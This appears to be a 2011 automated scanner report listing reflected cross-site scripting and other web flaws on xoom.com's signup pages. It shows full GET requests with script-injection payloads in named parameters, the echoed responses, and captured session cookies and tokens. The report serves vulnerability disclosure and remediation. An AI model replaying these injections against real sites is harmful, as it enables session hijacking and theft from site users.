XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, xoom.com Report generated by XSS.CX at Thu Nov 10 10:31:32 CST 2011. Loading
1. Cross-site scripting (reflected)
1.1. https://www.xoom.com/ [name of an arbitrarily supplied request parameter]
1.2. https://www.xoom.com/sendmoneynow/home [name of an arbitrarily supplied request parameter]
1.3. https://www.xoom.com/sendmoneynow/signUp [_action parameter]
1.4. https://www.xoom.com/sendmoneynow/signUp [contactInformation.email.value parameter]
1.5. https://www.xoom.com/sendmoneynow/signUp [contactInformation.firstName.value parameter]
1.6. https://www.xoom.com/sendmoneynow/signUp [contactInformation.lastName.value parameter]
1.7. https://www.xoom.com/sendmoneynow/signUp [contactInformation.phone1.value parameter]
1.8. https://www.xoom.com/sendmoneynow/signUp [emailVerification parameter]
1.9. https://www.xoom.com/sendmoneynow/signUp [first_name parameter]
1.10. https://www.xoom.com/sendmoneynow/signUp [intcid parameter]
1.11. https://www.xoom.com/sendmoneynow/signUp [lastName parameter]
1.12. https://www.xoom.com/sendmoneynow/signUp [name of an arbitrarily supplied request parameter]
1.13. https://www.xoom.com/sendmoneynow/signUp [name of an arbitrarily supplied request parameter]
1.14. https://www.xoom.com/sendmoneynow/signUp [name parameter]
1.15. https://www.xoom.com/sendmoneynow/signUp [newPassword parameter]
1.16. https://www.xoom.com/sendmoneynow/signUp [passwordVerification parameter]
1.17. https://www.xoom.com/sendmoneynow/signUp [phone1Included parameter]
1.18. https://www.xoom.com/sendmoneynow/signUp [phone1Included parameter]
1.19. https://www.xoom.com/sendmoneynow/signUp [signInTs parameter]
1.20. https://www.xoom.com/sendmoneynow/signUp [signInTs parameter]
1.21. https://www.xoom.com/sendmoneynow/signUp [token parameter]
1.22. https://www.xoom.com/sendmoneynow/signUp [token parameter]
2. XML injection
2.1. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 2]
2.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 3]
2.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 4]
3. Session token in URL
3.1. https://www.xoom.com/sendmoneynow/fp/check.js
3.2. https://www.xoom.com/sendmoneynow/fp/clear.png
3.3. https://www.xoom.com/sendmoneynow/fp/fp.swf
3.4. https://www.xoom.com/sendmoneynow/signUp
4. SSL cookie without secure flag set
4.1. https://www.xoom.com/sendmoneynow/home
4.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
4.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
4.4. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
4.5. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-core.js
4.6. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-init.js
5. Cookie scoped to parent domain
6. Cross-domain Referer leakage
7. Cross-domain script include
7.1. https://www.xoom.com/sendmoneynow/help/help-center
7.2. https://www.xoom.com/sendmoneynow/help/how-do-i-pay-for-a-xoom-transaction
7.3. https://www.xoom.com/sendmoneynow/home
7.4. https://www.xoom.com/sendmoneynow/signUp
8. Cookie without HttpOnly flag set
8.1. https://www.xoom.com/sendmoneynow/home
8.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
8.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
8.4. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
8.5. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-core.js
8.6. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-init.js
9. Cacheable HTTPS response
1. Cross-site scripting (reflected)
next
There are 22 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
1.1. https://www.xoom.com/ [name of an arbitrarily supplied request parameter]
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4f65"><script>alert(1)</script>c53dbe7ef5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /?b4f65"><script>alert(1)</script>c53dbe7ef5a =1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7
Response (redirected)
HTTP/1.1 200 OK73066d6bf36817"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]... b4f65"><script>alert(1)</script>c53dbe7ef5a =1&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.2. https://www.xoom.com/sendmoneynow/home [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15bf6"><script>alert(1)</script>90ad5d5fb73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/home?15bf6"><script>alert(1)</script>90ad5d5fb73 =1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=436274186.20480.0000
Response
HTTP/1.1 200 OK7b88bb09490564"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]... 15bf6"><script>alert(1)</script>90ad5d5fb73 =1&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.3. https://www.xoom.com/sendmoneynow/signUp [_action parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the _action request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7694e"><script>alert(1)</script>0d88741f7379e7c03 was submitted in the _action parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp7694e"><script>alert(1)</script>0d88741f7379e7c03 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK017B2672548BEC87D310563; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/4f51e3f90eb0bf"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... _action=signUp7694e"><script>alert(1)</script>0d88741f7379e7c03 &phone1Included=true&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bb...[SNIP]...
1.4. https://www.xoom.com/sendmoneynow/signUp [contactInformation.email.value parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the contactInformation.email.value request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1253"><script>alert(1)</script>4cb20ceecb5abc825 was submitted in the contactInformation.email.value parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=a1253"><script>alert(1)</script>4cb20ceecb5abc825 &name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK77486E779010ABC8AE5B89E; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/58a748f1115d79"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... _action=signUp&phone1Included=true&newPassword=&passwordVerification=&contactInformation.email.value=a1253"><script>alert(1)</script>4cb20ceecb5abc825 &countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=&name=&contactInformation.phone1.val...[SNIP]...
1.5. https://www.xoom.com/sendmoneynow/signUp [contactInformation.firstName.value parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the contactInformation.firstName.value request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9591f"><script>alert(1)</script>fd6e93582d8cef5b6 was submitted in the contactInformation.firstName.value parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=9591f"><script>alert(1)</script>fd6e93582d8cef5b6 &contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OKE01860CEB9378E837F0ED50; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/b009074ddc8d19"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... Information.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=9591f"><script>alert(1)</script>fd6e93582d8cef5b6 &name=&contactInformation.phone1.value=&signInTs=1320876654393&contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.6. https://www.xoom.com/sendmoneynow/signUp [contactInformation.lastName.value parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the contactInformation.lastName.value request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85a9"><script>alert(1)</script>c3eb732814ac42400 was submitted in the contactInformation.lastName.value parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=c85a9"><script>alert(1)</script>c3eb732814ac42400 &contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK35AE7645C897288ECE43E57; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/c401198373d706"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... 2187005bbf233797a34f661246cb&name=&contactInformation.firstName.value=&contactInformation.phone1.value=&signInTs=1320876654393&contactInformation.lastName.value=c85a9"><script>alert(1)</script>c3eb732814ac42400 &languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.7. https://www.xoom.com/sendmoneynow/signUp [contactInformation.phone1.value parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the contactInformation.phone1.value request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1938"><script>alert(1)</script>59ac63e2d322439b2 was submitted in the contactInformation.phone1.value parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=f1938"><script>alert(1)</script>59ac63e2d322439b2 &phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OKB8ACCEC8365CD16BB666883; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/808910ce8792c2"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... ;first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&name=&contactInformation.firstName.value=&contactInformation.phone1.value=f1938"><script>alert(1)</script>59ac63e2d322439b2 &signInTs=1320876654393&contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.8. https://www.xoom.com/sendmoneynow/signUp [emailVerification parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the emailVerification request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b37a2"><script>alert(1)</script>ce7f0b7a9e13fac6e was submitted in the emailVerification parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=b37a2"><script>alert(1)</script>ce7f0b7a9e13fac6e &newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK138E31EC39D4547366FCA14; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/032d953b7872f7"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... _action=signUp&phone1Included=true&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=b37a2"><script>alert(1)</script>ce7f0b7a9e13fac6e &token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&contactInformation.firstName.value=&name=&contactInformation.phone1.value=&contactInformation.lastName.value=&signInTs=13...[SNIP]...
1.9. https://www.xoom.com/sendmoneynow/signUp [first_name parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the first_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c79da"><script>alert(1)</script>fdaeda6b843a9ee82 was submitted in the first_name parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=c79da"><script>alert(1)</script>fdaeda6b843a9ee82 &countryCode=US&lastName=&contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
HTTP/1.1 200 OK0EE797DDCC9994AE1D9855C; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/e3f784ef9571ec"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... =true&lastName=&_action=signUp&newPassword=&passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=c79da"><script>alert(1)</script>fdaeda6b843a9ee82 &emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&name=&contactInformation.firstName.value=&contactInformation.phone1.value=&signInTs=1320876654393&...[SNIP]...
1.10. https://www.xoom.com/sendmoneynow/signUp [intcid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the intcid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60796"><script>alert(1)</script>e74b605c7d1 was submitted in the intcid parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?intcid=home2_____signup60796"><script>alert(1)</script>e74b605c7d1 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/homeE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 200 OK0deee78ba43e82"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... _signup60796"><script>alert(1)</script>e74b605c7d1 &languageCode=de" rel="de" title="Deutsch">...[SNIP]...
1.11. https://www.xoom.com/sendmoneynow/signUp [lastName parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The value of the lastName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 435f9"><script>alert(1)</script>e78f8fffe8ec9c07a was submitted in the lastName parameter. This input was echoed unmodified in the application's response.
Request
GET /sendmoneynow/signUp?first_name=&countryCode=US&lastName=435f9"><script>alert(1)</script>e78f8fffe8ec9c07a &contactInformation.firstName.value=&contactInformation.lastName.value=&contactInformation.email.value=&name=&emailVerification=&newPassword=&passwordVerification=&contactInformation.phone1.value=&phone1Included=true&signInTs=1320876654393&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb&_action=signUp HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_v1%3Dhome2_____signup%3B%20s_gvo_visit%3DNew%3B%20s_sq%3D%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878451349%3B%20s_nr%3D1320876651352-New%7C1323468651352%3B%20s_gpv_pn%3Dhome.signup%2520-xoom%7C1320878451355%3B%20s_nr2%3D1320876651360-New%7C1478556651360%3B%20s_vs%3D1%7C1320878451380%3B
Response
